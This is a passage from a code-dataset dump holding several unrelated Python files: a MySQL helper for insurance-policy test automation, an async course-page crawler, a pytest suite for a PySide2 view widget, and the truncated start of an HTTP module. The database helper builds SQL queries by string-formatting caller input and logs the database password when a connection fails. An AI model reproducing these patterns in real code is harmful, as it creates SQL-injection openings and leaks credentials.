database=self.database, user=self.username, password=self.password)\n conn.autocommit = True\n if verbose:\n logger.success(\"DB connected successfully\")\n return conn\n except mysql.connector.Error as e:\n logger.fail(\"DB connection failure %s\" % e)\n tabspace = \"\\n\" + \" \" * 19\n logger.info(\"Connection parameters:{t}host = '{h}';{t}port = '{p}';{t}database = '{d}';{t}user = '{u}';{t}password = '{w}'\".format(\n t=tabspace, h=self.host, p=self.port, d=self.database, u=self.username, w=self.password))\n raise e\n\n def __del__(self):\n self.connection.close()\n\n def __enter__(self):\n return self\n\n def __exit__(self, ttype, value, traceback):\n self.__del__()\n\n def destroy(self):\n self.__del__()\n\n def get_disabled_companies_for_partner_id(self, partner_id):\n cursor = self.connection.cursor()\n query = \"select distinct cast(propValue as unsigned) from partnerProperties \" \\\n \"where propName='disabled_company' and partnerId='%s';\" % partner_id\n try:\n cursor.execute(query)\n company_ids = [company_id[0] for company_id in cursor]\n if company_ids:\n return company_ids\n return False\n finally:\n cursor.close()\n\n def is_company_blocked(self, company_id):\n cursor = self.connection.cursor()\n query = \"select isBlocked from companies where id='%s';\" % company_id\n try:\n cursor.execute(query)\n blocked_state = [is_blocked[0] for is_blocked in cursor]\n return bool(blocked_state[0])\n finally:\n cursor.close()\n\n def get_company_id_by_name(self, company_name):\n cursor = self.connection.cursor()\n query = \"select `id` from companies where name='%s';\" % company_name\n try:\n cursor.execute(query)\n company_id = [company_id[0] for company_id in cursor]\n return company_id[0] if company_id else False\n finally:\n cursor.close()\n\n def get_key_for_partner_id(self, partner_id):\n cursor = self.connection.cursor()\n query = \"select `key` from apiKeys where partnerId='%s';\" % partner_id\n try:\n cursor.execute(query)\n partner_keys = [key[0] for key in cursor]\n return partner_keys[0] if partner_keys else False\n finally:\n cursor.close()\n\n def 
get_key_for_partner_code(self, company_code):\n cursor = self.connection.cursor()\n query = \"select `key` from apiKeys where partnerId = (select id from partners where code = '%s');\" % company_code\n try:\n cursor.execute(query)\n key = [key[0] for key in cursor]\n return key[0] if key else False\n finally:\n cursor.close()\n\n def get_insurance_companies_list(self, disabled=None):\n cursor = self.connection.cursor()\n try:\n selection = \"where isBlocked={0}\".format(disabled) if disabled == 1 or disabled == 0 else \"\"\n cursor.execute(\"select code, name from companies {0}\".format(selection))\n return {code: name for (code, name) in cursor}\n finally:\n cursor.close()\n\n def get_countries_list(self, enabled=None):\n cursor = self.connection.cursor()\n try:\n selection = \"where isInsurable={0}\".format(enabled) if enabled == 1 or enabled == 0 else \"\"\n cursor.execute(\"select code from countries {0}\".format(selection))\n return [code[0] for code in cursor]\n finally:\n cursor.close()\n\n def get_countries_names(self):\n cursor = self.connection.cursor()\n try:\n cursor.execute(\"select code, name from countries\")\n return {code: name for (code, name) in cursor}\n finally:\n cursor.close()\n\n def get_dollar_exchange_rate(self):\n cursor = self.connection.cursor()\n try:\n cursor.execute(\"select rate from currencyRate where dateRate=CURDATE() and code='USD'\")\n result = [float(decimal[0]) for decimal in cursor]\n return result[0] if result else 0.0\n finally:\n cursor.close()\n\n def get_euro_exchange_rate(self):\n cursor = self.connection.cursor()\n try:\n cursor.execute(\"select rate from currencyRate where dateRate=CURDATE() and code='EUR'\")\n result = [float(decimal[0]) for decimal in cursor]\n return result[0] if result else 0.0\n finally:\n cursor.close()\n\n def verify_policy_data_in_database_by_task_id(self, task_id, price, check_parent_task_only=False):\n operation_name = \"Check task for policy and price in database\"\n logger.start(operation_name)\n if task_id is None:\n return self.finish_skip(operation_name + \" (Task id was not received)\")\n total_summ = 0.0\n try:\n # check if parent task exists in database\n self.find_task_id(task_id)\n logger.success(\"The parent task '%s' found in database\" % task_id)\n if check_parent_task_only:\n logger.warning(\"Policy creation is in progress, no need to check any further\")\n return self.finish_success(operation_name)\n # get child task that created policy for parent task\n for child_task_id in self.get_task_id_list_to_create_policy(task_id):\n logger.success(\"The child task '%s' to create policy found in database\" % child_task_id)\n # verify that database has records about created policy\n for policy_id in self.get_policy_ids_by_task_id(child_task_id):\n logger.success(\"The policy '%s' made by task '%s' found in database\" % (policy_id, child_task_id))\n # check the calculations for task were successfully made\n for calculation_id in self.get_policy_calculation_by_task_id(child_task_id):\n logger.success(\"The calculation '%s' for created policy found in database\" % calculation_id)\n # get prices for selected calculation and calculate total summ\n for db_price in self.get_policy_price_by_calculation_id(calculation_id):\n logger.success(\"The calculated price '%.2f' found in database\" % db_price)\n total_summ += db_price\n return self.finish_success(operation_name) \\\n if self.is_price_equal_total_summ(total_summ, price) \\\n else self.finish_fail(operation_name)\n except ValueError:\n logger.warning(\"Check 
supervisor status on remote host and restart it if needed ('sudo service supervisor restart')\")\n return self.finish_fail(operation_name)\n\n def verify_avia_policy_data_in_database_by_task_id(self, task_id, calc_id):\n operation_name = \"Check task for avia policy and price in database\"\n logger.start(operation_name)\n if task_id is None:\n return self.finish_skip(operation_name + \" (Task id was not received)\")\n try:\n # check if parent task exists in database\n self.find_task_id(task_id)\n logger.success(\"The parent task '%s' found in database\" % task_id)\n calculation_code_in_database = \\\n self.execute_query(\"select uuid from tasks where id='%s'\" % task_id)[0][0]\n is_equal(calculation_code_in_database, calc_id, \"Calculation code for task '%s'\" % task_id)\n # get child task that created policy for parent task\n for child_task_id in self.get_task_id_list_to_create_avia_policy(task_id):\n logger.success(\"The child task '%s' to create policy found in database\" % child_task_id)\n # verify that database has records about created policy\n for policy_id in self.get_policy_ids_by_task_id(child_task_id):\n logger.success(\"The policy '%s' made by task '%s' found in database\" % (policy_id, child_task_id))\n return self.finish_success(operation_name)\n except ValueError:\n logger.warning(\"Check supervisor status on remote host and restart it if needed ('sudo service supervisor restart')\")\n return self.finish_fail(operation_name)\n\n def verify_policies_payment_system_by_task_id(self, task_id, payment_system, check_parent_task_only):\n operation_name = \"Check payment system for policies\"\n logger.start(operation_name)\n if task_id is None:\n return self.finish_skip(operation_name + \" (Task id was not received)\")\n try:\n # check if parent task exists in database\n self.find_task_id(task_id)\n logger.success(\"The parent task '%s' found in database\" % task_id)\n if check_parent_task_only:\n logger.warning(\"Policy creation is in progress, no need to check any further\")\n return self.finish_success(operation_name)\n logger.info(\"Expected payment system: '%s'\" % self.get_payment_system_name_by_code(payment_system))\n logger.info(\"Expected payment system id: '%s'\" % self.get_payment_system_id_by_code(payment_system))\n\n # get child task that created policy for parent task\n result = True\n for child_task_id in self.get_task_id_list_to_create_policy(task_id):\n logger.success(\"The child task '%s' to create policy found in database\" % child_task_id)\n # verify that database has records about created policy\n for policy_id in self.get_policy_ids_by_task_id(child_task_id):\n logger.success(\"The policy '%s' made by task '%s' found in database\" % (policy_id, child_task_id))\n result = is_equal(actual_value=self.get_policy_payment_system_id_by_policy_id(policy_id),\n expected_value=self.get_payment_system_id_by_code(payment_system),\n value_name=\"Policy transaction payment system\") \\\n and result\n return self.finish_success(operation_name) \\\n if result \\\n else self.finish_fail(operation_name)\n except ValueError:\n logger.warning(\"Check supervisor status on remote host and restart it if needed ('sudo service supervisor restart')\")\n return self.finish_fail(operation_name)\n\n def verify_policy_payment_system(self, policy_id, payment_system):\n query = \"select paymentSystemId from transactions where id=(select transactionId from policiesTransactions where policyId=%s)\" % policy_id\n cursor = self.connection.cursor()\n try:\n cursor.execute(query)\n paymentSystemId = 
[psid[0] for psid in cursor]\n if len(paymentSystemId) != 1:\n msg = \"Payment System for policy '%s'\" % policy_id\n logger.fail(\"No \" + msg + \" is found in database\")\n raise ValueError(\"No \" + msg + \" is found in database\")\n if paymentSystemId[0] == payment_system:\n return True\n return False\n finally:\n cursor.close()\n\n def find_task_id(self, task_id):\n cursor = self.connection.cursor()\n try:\n cursor.execute(\"select id from tasks where id='%s'\" % task_id)\n tasks = [ids[0] for ids in cursor]\n if len(tasks) != 1:\n msg = \"Task with id '%s'\" % task_id\n logger.fail(\"No \" + msg + \" is found in database\")\n raise ValueError(\"No \" + msg + \" is found in database\")\n return tasks\n finally:\n cursor.close()\n\n def get_task_id_list_to_create_policy(self, task_id):\n try:\n cursor = self.connection.cursor()\n cursor.execute(\"select id from tasks where code in ('CreatePolicy', 'CreateConfirmPolicy') and taskId='%s'\" % task_id)\n tasks_to_create_policy = [ids[0] for ids in cursor]\n if not tasks_to_create_policy:\n msg = \"Task to create policy with parent task_id '%s' (code 'CreatePolicy' or 'CreateConfirmPolicy')\" % task_id\n logger.fail(\"No \" + msg + \" is found in database\")\n raise ValueError(\"No \" + msg + \" is found in database\")\n return tasks_to_create_policy\n finally:\n cursor.close()\n\n def get_task_id_list_to_create_avia_policy(self, task_id):\n try:\n cursor = self.connection.cursor()\n cursor.execute(\"select id from tasks where code in ('CreateSingleAviaPolicy') and taskId='%s'\" % task_id)\n tasks_to_create_policy = [ids[0] for ids in cursor]\n if len(tasks_to_create_policy) == 0:\n msg = \"Task to create policy with parent task_id '%s' (code 'CreateSingleAviaPolicy')\" % task_id\n logger.fail(\"No \" + msg + \" is found in database\")\n raise ValueError(\"No \" + msg + \" is found in database\")\n return tasks_to_create_policy\n finally:\n cursor.close()\n\n def get_policy_ids_by_task_id(self, task_id):\n try:\n cursor = self.connection.cursor()\n cursor.execute(\"select id from policies where taskId='%s'\" % task_id)\n policy_id_created = [ids[0] for ids in cursor]\n if len(policy_id_created) == 0:\n msg = \"Policy for task '%s'\" % task_id\n logger.fail(\"No \" + msg + \" is found in database\")\n raise ValueError(\"No \" + msg + \" is found in database\")\n return policy_id_created\n finally:\n cursor.close()\n\n def get_policy_calculation_by_task_id(self, task_id):\n try:\n cursor = self.connection.cursor()\n cursor.execute(\"select calculationId from policies where taskId='%s'\" % task_id)\n calculation_id_list = [ids[0] for ids in cursor]\n if len(calculation_id_list) == 0:\n msg = \"Calculations for task '%s'\" % task_id\n logger.fail(\"No \" + msg + \" were found in database\")\n raise ValueError(\"No \" + msg + \" were found in database\")\n return calculation_id_list\n finally:\n cursor.close()\n\n def get_policy_price_by_calculation_id(self, calculation_id):\n try:\n cursor = self.connection.cursor()\n cursor.execute(\"select price from calculations where id=%s\" % calculation_id)\n price_calculated = [float(prices[0]) for prices in cursor]\n if len(price_calculated) == 0:\n msg = \"Calculated price for calculation '%s'\" % calculation_id\n logger.fail(\"No \" + msg + \" is found in database\")\n raise ValueError(\"No \" + msg + \" is found in database\")\n return price_calculated\n finally:\n cursor.close()\n\n def get_countries_from_euro_zone(self):\n try:\n cursor = self.connection.cursor()\n query = \"SELECT c.code FROM countryGroups cg \" \\\n \"LEFT JOIN countriesCountryGroups ccg ON 
ccg.countryGroupId = cg.id \" \\\n \"LEFT JOIN countries c ON c.id = ccg.countryId \" \\\n \"WHERE cg.`code` = 'europe'\"\n cursor.execute(query)\n return [code[0] for code in cursor]\n finally:\n cursor.close()\n\n def is_price_equal_total_summ(self, total_summ, price):\n if price is None:\n return logger.warning(\"Check policy price with expected value (Price was not received): Skipped\") and False\n msg = \"The policy price in database (%.2f) is equal to expected (%.2f)\" % (total_summ, price)\n if total_summ == price:\n return logger.success(msg) or True\n elif abs(total_summ - price) <= 0.5:\n # Calculation accuracy depends on the companies rules, so final values can be rounded for database.\n # Acceptable difference between calculated and finally processed price is taken as 0.50 Rub.\n logger.success(msg)\n return logger.warning(\"The price in database is not equal to the calculated price (difference = %s)\"\n % round(abs(total_summ - price), 2)) or True\n else:\n return logger.fail(msg) and False\n\n def finish_success(self, message):\n logger.finishSuccess(message)\n logger.print_empty_line()\n return True\n\n def finish_fail(self, message):\n logger.finishFail(message)\n logger.print_empty_line()\n return False\n\n def finish_skip(self, message):\n logger.finishSkipped(message)\n logger.print_empty_line()\n return True\n\n def get_sport_name_by_code(self, code, competition=False):\n cursor = self.connection.cursor()\n try:\n cursor.execute(\"select * from sports where code='%s' and isCompetition=%s\" % (code, int(competition)))\n sport_name = [sport[1] for sport in cursor]\n return sport_name[0] if sport_name else None\n finally:\n cursor.close()\n\n def get_country_group_by_code(self, code):\n cursor = self.connection.cursor()\n try:\n cursor.execute(\"select * from countryGroups where code='%s'\" % code)\n group_name = [group[2] for group in cursor]\n return group_name[0] if group_name else None\n finally:\n cursor.close()\n\n def get_country_by_code(self, code):\n cursor = self.connection.cursor()\n try:\n cursor.execute(\"select * from countries where code='%s'\" % code)\n group_name = [group[2] for group in cursor]\n return group_name[0] if group_name else None\n finally:\n cursor.close()\n\n def is_user_in_database(self, username, verbose=False):\n if verbose:\n logger.info(\"Looking database for user with login '%s' ..\" % username)\n query = \"select id from users where login='%s';\" % username\n cursor = self.connection.cursor()\n try:\n cursor.execute(query)\n user_id_list = [user[0] for user in cursor]\n if len(user_id_list) == 0:\n if verbose:\n logger.success(\"User '%s' is not found in database\" % username)\n return False\n elif len(user_id_list) == 1:\n if verbose:\n logger.success(\"User '%s' is found in database\" % username)\n return True\n else:\n logger.error(\"Unexpected number of results (%s) for query \\\"%s\\\": only 1 should appear as result\"\n % (len(user_id_list), query))\n raise ValueError(\"Unexpected query result while checking user in database\")\n finally:\n cursor.close()\n\n def get_valid_partner_keys(self):\n cursor = self.connection.cursor()\n try:\n cursor.execute(\"select apiKeys.key from apiKeys;\")\n api_keys = [api_key[0] for api_key in cursor]\n return api_keys if api_keys else None\n finally:\n cursor.close()\n\n def execute_query(self, query):\n cursor = self.connection.cursor()\n try:\n cursor.execute(query)\n result = [x for x in cursor]\n return result if result else []\n finally:\n cursor.close()\n\n def 
get_payment_system_id_by_code(self, code):\n cursor = self.connection.cursor()\n try:\n cursor.execute(\"select id from paymentSystems where code='%s'\" % code)\n output = [result[0] for result in cursor]\n return output[0]\n finally:\n cursor.close()\n\n def get_payment_system_name_by_code(self, code):\n cursor = self.connection.cursor()\n try:\n cursor.execute(\"select name from paymentSystems where code='%s'\" % code)\n output = [result[0] for result in cursor]\n return output[0]\n finally:\n cursor.close()\n\n def get_policy_payment_system_id_by_policy_id(self, policy_id):\n query = \"select t.paymentSystemId from policies as p \" \\\n \"left join policiesTransactions as pt on p.id = pt.policyId \" \\\n \"left join transactions as t on t.id = pt.transactionId \" \\\n \"where p.id = '%s'\" % policy_id\n cursor = self.connection.cursor()\n try:\n cursor.execute(query)\n payment_system_id = [x[0] for x in cursor]\n return payment_system_id[0] if payment_system_id else -1\n finally:\n cursor.close()\n\n def get_blocked_companies(self):\n query = \"select id from cherehapa_funk.companies where isBlocked=1\"\n cursor = self.connection.cursor()\n try:\n cursor.execute(query)\n return [x[0] for x in cursor]\n finally:\n cursor.close()\n\n\nif __name__ == \"__main__\": # self check\n db = CheDb(config_module.load()[\"database\"])\n del db\n","sub_path":"che-test/scripts/autotests/common/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":21900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"544515532","text":"import time\n\nimport aiohttp\nimport asyncio\n\nfrom course import extract_courses\nfrom detail import extract_details, rename_keys\nfrom detail.other_partial_detail import course_page_detail\nfrom faculty import get_faculty_urls_with_name\nfrom faculty.fac_info import get_one_fac_info\nfrom test import final_run\nfrom write_to_json import write_to_json\n\nfrom category import extract_categories\n\n\nasync def start_crawl(base_url):\n session = aiohttp.ClientSession()\n category_list = await extract_categories(base_url, session)\n write_to_json(category_list, './category/outputfiles/categories.json')\n course_list = extract_courses()\n write_to_json(course_list, './course/outputfiles/courses.json')\n detail_list = await extract_details(course_list,session)\n write_to_json(detail_list, './detail/outputfiles/origin_details.json')\n partial_detail = rename_keys(detail_list)\n write_to_json(partial_detail, './detail/outputfiles/first_partial_detail.json')\n\n coroutines = []\n for detail in partial_detail:\n coroutines.append(course_page_detail(detail,session))\n final_details = await asyncio.gather(*coroutines)\n # print(final_details)\n write_to_json(final_details, './detail/outputfiles/detail_6110_CBUS_XW_0226.json')\n\n fac_urls_with_names = get_faculty_urls_with_name(final_details)\n coroutines = []\n for url_with_name in fac_urls_with_names:\n coroutines.append(get_one_fac_info(url_with_name[0],url_with_name[1],session))\n faculties = await asyncio.gather(*coroutines)\n write_to_json(faculties, 'faculty/outputfiles/faculty_6110_CBUS_XW_0316.json')\n await session.close()\n return\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n start_time = time.time()\n BASE_URL = 'https://business.stthomas.edu/executive-education/individuals/index.html'\n asyncio.run(start_crawl(BASE_URL))\n final_run()\n duration = time.time() - start_time\n minutes = duration // 60\n 
print(f\"Crawled {duration} seconds, {minutes} mins\")\n\n","sub_path":"4_opus_6110_single/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"593925105","text":"from pathlib import Path\n\nimport pandas as pd\nimport pytest\nfrom PySide2.QtCore import Qt\nfrom PySide2.QtWidgets import QHeaderView, QSizePolicy\nfrom esofile_reader import EsoFile\n\nfrom chartify.ui.simpleview import SimpleView\nfrom chartify.utils.utils import FilterTuple, VariableData\nfrom tests import ROOT\n\nWIDTH = 402\n\n\n@pytest.fixture(scope=\"module\")\ndef eso_file():\n return EsoFile(Path(ROOT, \"eso_files\", \"eplusout1.eso\")).generate_totals()\n\n\n@pytest.fixture\ndef hourly_df(eso_file):\n return eso_file.get_header_df(\"hourly\")\n\n\n@pytest.fixture\ndef daily_df(eso_file):\n return eso_file.get_header_df(\"daily\")\n\n\n@pytest.fixture\ndef simple_view(qtbot, hourly_df):\n simple_view = SimpleView(0)\n simple_view.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Expanding)\n simple_view.setFixedWidth(WIDTH)\n simple_view.setVerticalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n simple_view.populate_view(variables_df=hourly_df.copy(), interval=\"hourly\", is_tree=True)\n simple_view.update_view_appearance()\n simple_view.show()\n qtbot.addWidget(simple_view)\n return simple_view\n\n\ndef test_init_simple_view(simple_view: SimpleView):\n assert simple_view.rootIsDecorated()\n assert simple_view.uniformRowHeights()\n assert simple_view.isSortingEnabled()\n assert simple_view.hasMouseTracking()\n assert simple_view.dragEnabled()\n\n assert not simple_view.wordWrap()\n assert not simple_view.alternatingRowColors()\n\n assert simple_view.selectionBehavior() == SimpleView.SelectRows\n assert simple_view.selectionMode() == SimpleView.ExtendedSelection\n assert simple_view.editTriggers() == SimpleView.NoEditTriggers\n assert simple_view.defaultDropAction() == Qt.CopyAction\n assert simple_view.horizontalScrollBarPolicy() == Qt.ScrollBarAsNeeded\n assert simple_view.focusPolicy() == Qt.NoFocus\n\n assert simple_view.id_ == 0\n\n\ndef test_build_simple_view(qtbot, simple_view: SimpleView, hourly_df: pd.DataFrame):\n assert simple_view.model().rowCount() == 49\n assert simple_view.model().sourceModel().rowCount() == 49\n\n assert simple_view.interval == \"hourly\"\n assert not simple_view.is_tree\n assert not simple_view.rate_to_energy\n assert simple_view.units_system == \"SI\"\n assert simple_view.energy_units == \"J\"\n assert not simple_view.next_update_forced\n\n\ndef test_initial_view_appearance(qtbot, simple_view: SimpleView, hourly_df: pd.DataFrame):\n assert simple_view.header().sectionSize(0) == 330\n assert simple_view.header().sectionSize(1) == 70\n\n assert not simple_view.header().stretchLastSection()\n assert simple_view.header().sectionResizeMode(0) == QHeaderView.Stretch\n assert simple_view.header().sectionResizeMode(1) == QHeaderView.Fixed\n\n assert simple_view.header().sortIndicatorOrder() == Qt.AscendingOrder\n\n\ndef test_on_view_resized_stretch(qtbot, simple_view: SimpleView, hourly_df: pd.DataFrame):\n simple_view.update_view_appearance()\n with qtbot.assertNotEmitted(simple_view.viewSettingsChanged):\n simple_view.header().resizeSection(1, 125)\n\n\ndef test_on_section_moved(qtbot, simple_view: SimpleView, hourly_df: pd.DataFrame):\n def test_header(cls, dct):\n return cls == \"simpleview\" and dct[\"header\"] == (\"units\", \"variable\")\n\n with 
qtbot.wait_signal(simple_view.viewSettingsChanged, check_params_cb=test_header):\n simple_view.header().moveSection(0, 1)\n\n\ndef test_on_slider_moved(simple_view: SimpleView, hourly_df: pd.DataFrame):\n simple_view.verticalScrollBar().setSliderPosition(10)\n\n assert simple_view.verticalScrollBar().value() == 10\n\n\ndef test_update_scrollbar_position(simple_view: SimpleView, daily_df: pd.DataFrame):\n simple_view.verticalScrollBar().setSliderPosition(10)\n simple_view.populate_view(daily_df, \"daily\")\n simple_view.update_scrollbar_position()\n assert simple_view.verticalScrollBar().value() == 10\n\n\ndef test_on_double_clicked(qtbot, simple_view: SimpleView, hourly_df: pd.DataFrame):\n def variable_data(index):\n test_data = VariableData(\"\", \"Boiler Gas Rate\", \"W\", \"W\")\n data = simple_view.model().data_at_index(index)\n return test_data == data\n\n point = simple_view.visualRect(simple_view.model().index(1, 0)).center()\n # need to move mouse to hover over view\n qtbot.mouseMove(simple_view.viewport(), pos=point)\n signals = [simple_view.doubleClicked, simple_view.itemDoubleClicked]\n callbacks = [variable_data, None]\n with qtbot.wait_signals(signals, check_params_cbs=callbacks):\n # need to click first as single double click would emit only pressed signal\n qtbot.mouseClick(simple_view.viewport(), Qt.LeftButton, pos=point)\n qtbot.mouseDClick(simple_view.viewport(), Qt.LeftButton, pos=point)\n\n\ndef test_on_double_clicked_second_column(\n qtbot, simple_view: SimpleView, hourly_df: pd.DataFrame\n):\n def variable_data(index):\n test_data = VariableData(\"\", \"Boiler Gas Rate\", \"W\", \"W\")\n data = simple_view.model().data_at_index(index.siblingAtColumn(0))\n return test_data == data\n\n point = simple_view.visualRect(simple_view.model().index(1, 1)).center()\n # need to move mouse to hover over view\n qtbot.mouseMove(simple_view.viewport(), pos=point)\n signals = [simple_view.doubleClicked, simple_view.itemDoubleClicked]\n callbacks = [variable_data, None]\n with qtbot.wait_signals(signals, check_params_cbs=callbacks):\n # need to click first as single double click would emit only pressed signal\n qtbot.mouseClick(simple_view.viewport(), Qt.LeftButton, pos=point)\n qtbot.mouseDClick(simple_view.viewport(), Qt.LeftButton, pos=point)\n\n\ndef test_on_pressed(qtbot, simple_view: SimpleView, hourly_df: pd.DataFrame):\n test_data = VariableData(\"\", \"Boiler Gas Rate\", \"W\", \"W\")\n\n def variable_data1(index):\n data = simple_view.model().data_at_index(index)\n return test_data == data\n\n def variable_data2(vd):\n return vd == [test_data]\n\n index = simple_view.model().index(1, 0)\n point = simple_view.visualRect(index).center()\n # need to move mouse to hover over view\n qtbot.mouseMove(simple_view.viewport(), pos=point)\n signals = [simple_view.pressed, simple_view.selectionPopulated]\n callbacks = [variable_data1, variable_data2]\n with qtbot.wait_signals(signals, check_params_cbs=callbacks):\n # need to click first as single double click would emit only pressed signal\n qtbot.mousePress(simple_view.viewport(), Qt.LeftButton, pos=point)\n\n\ndef test_on_pressed_right_mb(qtbot, simple_view: SimpleView, hourly_df: pd.DataFrame):\n index = simple_view.model().index(1, 0)\n point = simple_view.visualRect(index).center()\n qtbot.mouseMove(simple_view.viewport(), pos=point)\n with qtbot.assert_not_emitted(simple_view.pressed, ):\n qtbot.mousePress(simple_view.viewport(), Qt.RightButton, pos=point)\n\n\ndef test_is_tree_kwarg(simple_view: SimpleView, daily_df: 
pd.DataFrame):\n simple_view.populate_view(variables_df=daily_df, interval=\"daily\", is_tree=True)\n # simpleview is always plain table\n assert not simple_view.is_tree\n\n\ndef test_filter_view(simple_view: SimpleView):\n ft = FilterTuple(key=\"block1:zonea\", variable=\"temperature\", units=\"\")\n simple_view.filter_view(ft)\n\n assert simple_view.model().rowCount() == 5\n assert simple_view.model().sourceModel().rowCount() == 49\n assert simple_view.model().filter_tuple == ft\n\n test_data = [\n VariableData(\"\", \"Site Outdoor Air Dewpoint Temperature\", \"C\", \"C\"),\n VariableData(\"\", \"Site Outdoor Air Drybulb Temperature\", \"C\", \"C\"),\n VariableData(\"\", \"Zone Mean Air Temperature\", \"C\", \"C\"),\n VariableData(\"\", \"Zone Mean Radiant Temperature\", \"C\", \"C\"),\n VariableData(\"\", \"Zone Operative Temperature\", \"C\", \"C\"),\n ]\n\n for i, test_var in enumerate(test_data):\n index = simple_view.model().index(i, 0)\n data = simple_view.model().data_at_index(index)\n assert data == test_var\n\n\ndef test_get_visual_names(simple_view: SimpleView):\n assert simple_view.get_visual_names() == (\"variable\", \"units\")\n\n simple_view.reshuffle_columns((\"units\", \"variable\"))\n assert simple_view.get_visual_names() == (\"units\", \"variable\")\n\n\ndef test_get_visual_ixs(simple_view: SimpleView):\n assert simple_view.get_visual_indexes() == {\"variable\": 0, \"units\": 1}\n\n\ndef test_build_view_kwargs_rate_to_energy(simple_view: SimpleView, daily_df: pd.DataFrame):\n simple_view.populate_view(daily_df, \"daily\", is_tree=True, rate_to_energy=True)\n simple_view.update_view_appearance()\n proxy_model = simple_view.model()\n test_data = VariableData(\"\", \"Boiler Gas Rate\", \"W\", \"J\")\n assert proxy_model.data_at_index(proxy_model.index(1, 0)) == test_data\n assert proxy_model.data(proxy_model.index(1, 1)) == \"J\"\n\n\ndef test_build_view_kwargs_units_system(simple_view: SimpleView, daily_df: pd.DataFrame):\n simple_view.populate_view(daily_df, \"daily\", is_tree=True, units_system=\"IP\")\n simple_view.update_view_appearance()\n proxy_model = simple_view.model()\n test_data = VariableData(\"\", \"Site Outdoor Air Dewpoint Temperature\", \"C\", \"F\")\n\n assert proxy_model.data_at_index(proxy_model.index(22, 0)) == test_data\n assert proxy_model.data(proxy_model.index(22, 1)) == \"F\"\n\n\ndef test_build_view_kwargs_energy_units(simple_view: SimpleView, daily_df: pd.DataFrame):\n simple_view.populate_view(\n daily_df, \"daily\", is_tree=True, rate_to_energy=True, energy_units=\"MWh\"\n )\n simple_view.update_view_appearance()\n proxy_model = simple_view.model()\n test_data = VariableData(\"\", \"Boiler Gas Rate\", \"W\", \"MWh\")\n\n assert proxy_model.data_at_index(proxy_model.index(1, 0)) == test_data\n assert proxy_model.data(proxy_model.index(1, 1)) == \"MWh\"\n\n\ndef test_build_view_kwargs_power_units(simple_view: SimpleView, daily_df: pd.DataFrame):\n simple_view.populate_view(daily_df, \"daily\", is_tree=True, power_units=\"MW\")\n simple_view.update_view_appearance()\n proxy_model = simple_view.model()\n test_data = VariableData(\"\", \"Boiler Gas Rate\", \"W\", \"MW\")\n\n assert proxy_model.data_at_index(proxy_model.index(1, 0)) == test_data\n assert proxy_model.data(proxy_model.index(1, 1)) == \"MW\"\n\n\ndef test_update_view_appearance(simple_view: SimpleView, daily_df: pd.DataFrame):\n header = (\"units\", \"variable\")\n simple_view.populate_view(\n daily_df, \"daily\", header=header,\n )\n\n widths = {\"fixed\": 50}\n 
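# The widths mapping below appears to be read as resize-mode -> pixel size\n    # (an inference from the assertions that follow, not a documented contract):\n    # the \"fixed\" column is pinned at 50 px and the stretch column absorbs the\n    # remaining viewport width.\n    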
simple_view.update_view_appearance(header=header, widths=widths)\n\n assert simple_view.header().sectionSize(0) == 50\n assert simple_view.header().sectionSize(1) == 350\n\n assert simple_view.get_visual_names() == (\"units\", \"variable\")\n\n\ndef test_update_view_appearance_default(simple_view: SimpleView, daily_df: pd.DataFrame):\n simple_view.update_view_appearance()\n\n assert simple_view.header().sectionSize(0) == 330\n assert simple_view.header().sectionSize(1) == 70\n\n assert simple_view.get_visual_names() == (\"variable\", \"units\")\n\n\ndef test_scroll_to(qtbot, simple_view: SimpleView, hourly_df: pd.DataFrame):\n v = VariableData(\"\", \"Zone Infiltration Air Change Rate\", \"ach\", \"ach\")\n with qtbot.wait_signal(simple_view.verticalScrollBar().valueChanged):\n simple_view.scroll_to(v, \"variable\")\n\n assert simple_view.verticalScrollBar().value() == 27\n\n\ndef test_deselect_variables(qtbot, simple_view: SimpleView, daily_df: pd.DataFrame):\n selected = [\n VariableData(\"\", \"Boiler Ancillary Electric Power\", \"W\", \"kW\"),\n VariableData(\"\", \"Boiler Gas Rate\", \"W\", \"kW\"),\n ]\n simple_view.populate_view(\n daily_df, \"daily\", power_units=\"kW\",\n )\n simple_view.update_view_appearance()\n simple_view.select_variables(selected)\n proxy_rows = simple_view.selectionModel().selectedRows()\n variables_data = [simple_view.model().data_at_index(index) for index in proxy_rows]\n\n assert selected == variables_data\n\n with qtbot.wait_signal(simple_view.selectionCleared):\n simple_view.deselect_all_variables()\n\n assert not simple_view.selectionModel().selectedRows()\n\n\ndef test_select_variables(qtbot, simple_view: SimpleView):\n def variable_data(data):\n return data == selected\n\n selected = [\n VariableData(\"\", \"Boiler Ancillary Electric Power\", \"W\", \"W\"),\n VariableData(\"\", \"Boiler Gas Rate\", \"W\", \"W\"),\n ]\n\n with qtbot.wait_signal(simple_view.selectionPopulated, check_params_cb=variable_data):\n simple_view.select_variables(selected)\n\n proxy_rows = simple_view.selectionModel().selectedRows()\n variables_data = [simple_view.model().data_at_index(index) for index in proxy_rows]\n\n assert selected == variables_data\n\n\ndef test_select_variables_invalid(qtbot, simple_view: SimpleView):\n selected = [VariableData(\"\", \"FOO\", \"W\", \"W\"), VariableData(\"\", \"BAR\", \"W\", \"W\")]\n\n with qtbot.wait_signal(simple_view.selectionCleared):\n simple_view.select_variables(selected)\n\n\ndef test_drag(qtbot, simple_view: SimpleView):\n # difficult to test something properly as QTest mouse\n # actions do not have an impact on drag and drop\n import threading\n\n def drag():\n simple_view.startDrag(Qt.CopyAction)\n\n t = threading.Thread(target=drag)\n t.start()\n t.join(0.1)\n","sub_path":"tests/ui/test_simpleview.py","file_name":"test_simpleview.py","file_ext":"py","file_size_in_byte":13274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"343910675","text":"import os\nimport aiohttp\nimport asyncio\nimport logging\nimport sys\nimport time\nimport json as json_decoder\nimport typing\n\n__all__ = 'HTTP'\n\nfrom .. 
